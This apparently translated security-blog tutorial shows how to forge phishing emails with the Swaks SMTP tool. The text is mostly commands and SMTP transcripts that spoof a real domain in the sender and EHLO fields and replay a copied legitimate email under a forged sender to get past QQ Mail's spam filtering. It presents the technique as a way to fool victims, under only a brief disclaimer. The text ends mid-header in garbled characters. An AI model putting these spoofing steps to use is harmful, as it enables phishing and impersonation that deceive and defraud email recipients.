Exploring phishing emails: How do hackers forge emails?

Exploring phishing emails: How do hackers forge emails?

Disclaimer: This site provides security tools and procedures (methods) that may be offensive and only for security research and teaching. You are at your own risk!

Nowadays, phishing emails are registered with similar email addresses or set the display name of the email address. We hope that the victim will trust the content of the email when the victim looks at it. This method requires some social engineering skills and an inductive language to lure victims into being hooked. However, for those who have experience and eyesight, they can still find the tricks of scammers.

The tool I will introduce below can fool your mailbox to the greatest extent, not to mention your eyes. Of course, this method is not applicable to any mailbox. After all, the filter mechanism of each mailbox is different. Gmail is doing well in this regard.

Swaks-Swiss Army knife in SMTP

Installation: self-contained in kali or downloaded from the author's webpage

Basic usage:

Swaks-to <email address to be tested>Used to test mailbox connectivity

root@kali:~# swaks --to [email protected]=== Trying mx3.qq.com:25...=== Connected to mx3.qq.com.<-  220 newmx59.qq.com MX QQ Mail Server -> EHLO kali<-  250-newmx59.qq.com<-  250-SIZE 73400320<-  250-STARTTLS<-  250 OK -> MAIL FROM:
 
  <-  250 Ok -> RCPT TO:
  
   <-  250 Ok -> DATA<-  354 End data with 
   
    
     .
     
      
        -> Date: Tue, 05 Jan 2016 23:15:11 -0500 -> To: [email protected] -> From: root@kali -> Subject: test Tue, 05 Jan 2016 23:15:11 -0500 -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ ->  -> This is a test mailing ->  -> .<** 550 Mail content denied. http://service.mail.qq.com/cgi-bin/help?subtype=1&&id=20022&&no=1000726 -> QUIT<-  221 Bye=== Connection closed with remote host.
      
     
    
   
  
 

The above results all return 250ok, indicating that the email address exists and can receive emails normally. At last, we can see that the qq mailbox returned the 550 error. The official qq gave the cause of the error: the content of this email is suspected of sending a large number of emails, and most users complained about it as spam.

We can continue to forge emails to bypass QQ mail's judgment.

For example:

swaks --to [email protected] --from [email protected] --ehlo freebuf.com --body hello --header "Subject: hello"

Where:

-From <sender's email address to be displayed>

-Ehlo <forged email ehlo header>

-Body <email body>

-Header

root@kali:~# swaks --to [email protected] --from [email protected] --ehlo freebuf.com --body hello --header "Subject: hello"=== Trying mx3.qq.com:25...=== Connected to mx3.qq.com.<-  220 newmx.qq.com MX QQ Mail Server -> EHLO freebuf.com<-  250-newmx.qq.com<-  250-SIZE 73400320<-  250-STARTTLS<-  250 OK -> MAIL FROM:
       
        <-  250 Ok -> RCPT TO:
        
         <-  250 Ok -> DATA<-  354 End data with 
         
          
           .
           
            
              -> Date: Tue, 05 Jan 2016 23:23:09 -0500 -> To: [email protected] -> From: [email protected] -> Subject: hello -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ ->  -> hello ->  -> .<-  250 Ok: queued as  -> QUIT<-  221 Bye=== Connection closed with remote host.
            
           
          
         
        
       

If your ip address is not in the QQ mailbox band, the email can be sent normally and the 250 OK message is returned.

 

This step can basically meet the requirements of forged mail, but there will be a security prompt in the QQ mailbox, but without attention, basically ordinary users will trust the content in the mail.

Advanced usage:

Swaks can also be used for more advanced mail forgery, and almost every parameter in the mail can be forged.

-Data <source email>

First, we need a normal email.

 

Click to display the original mail, copy the original text, save it as email.txt

 

The received can be deleted. This parameter indicates the receiving information, which is not required in sending. To items can also be deleted, which can be replaced by swaks-to directly.

Do not forget to add-from. Otherwise, the QQ mailbox will report the message sent by kali ......

swaks --data ./Desktop/email.txt --to [email protected] --from [email protected]

=== Trying mx3.qq.com:25...=== Connected to mx3.qq.com.<-  220 newmx.qq.com MX QQ Mail Server -> EHLO kali<-  250-newmx.qq.com<-  250-SIZE 73400320<-  250-STARTTLS<-  250 OK -> MAIL FROM:
             
              <-  250 Ok -> RCPT TO:
              
               <-  250 Ok -> DATA<-  354 End data with 
               
                
                 .
                 
                  
                    -> X-QQ-mid: bizesmtp1t1452053499t679t108 -> X-QQ-SSF: A0100000002000F16x90000A0000000 -> X-QQ-FEAT: JN+C/NT9bLPRA1qtkTz2XI2YtLAH2K0SriLtB4o1q8I8MwPIq85lzXVAE4t7b -> OaepuNhlRjNMuNhLJH2pbIQ3JkVf4MP4TXQi2HVPIG8N8dUf6GgxSJyMKya1U+CgOSvNgnP -> bbplbVZjkAVzVuoZOc03UetuyeF1A3SpS70fm7O8nzDqx918Tpsf+n3dlMN6UaAEV3SJycL -> 1JuHYi2/yTQ7J6XJ4bMhJRRbRROkDmpNEgqGw1Sfo66A/oJUz0rf4tLEr7HgNuls18LrqZV -> jYfpcX5wglT4lxLNkHZRNBshk= -> Date: Wed, 6 Jan 2016 12:11:39 +0800 -> Return-Path: [email protected] -> From: =?utf-8?B?RnJlZUJ1Zi/mvI/mtJ7nm5LlrZDmnI3liqHlm6LpmJ8=?= 
                   
                     -> Subject: =?utf-8?B?RnJlZUJ1Zi/mvI/mtJ7nm5LlrZDotKbmiLfmv4DmtLvpgq7ku7Y=?= -> Message-ID: <[email protected]> -> X-Priority: 3 -> X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net) -> MIME-Version: 1.0 -> Content-Type: multipart/alternative; -> boundary="b1_34db99d2b030c0f7b34bd2c6beca9666" ->  ->  -> --b1_34db99d2b030c0f7b34bd2c6beca9666 -> Content-Type: text/plain; charset = "utf-8" -> Content-Transfer-Encoding: 8bit ->  -> FreeBuf/????′???’?-?è′|??·??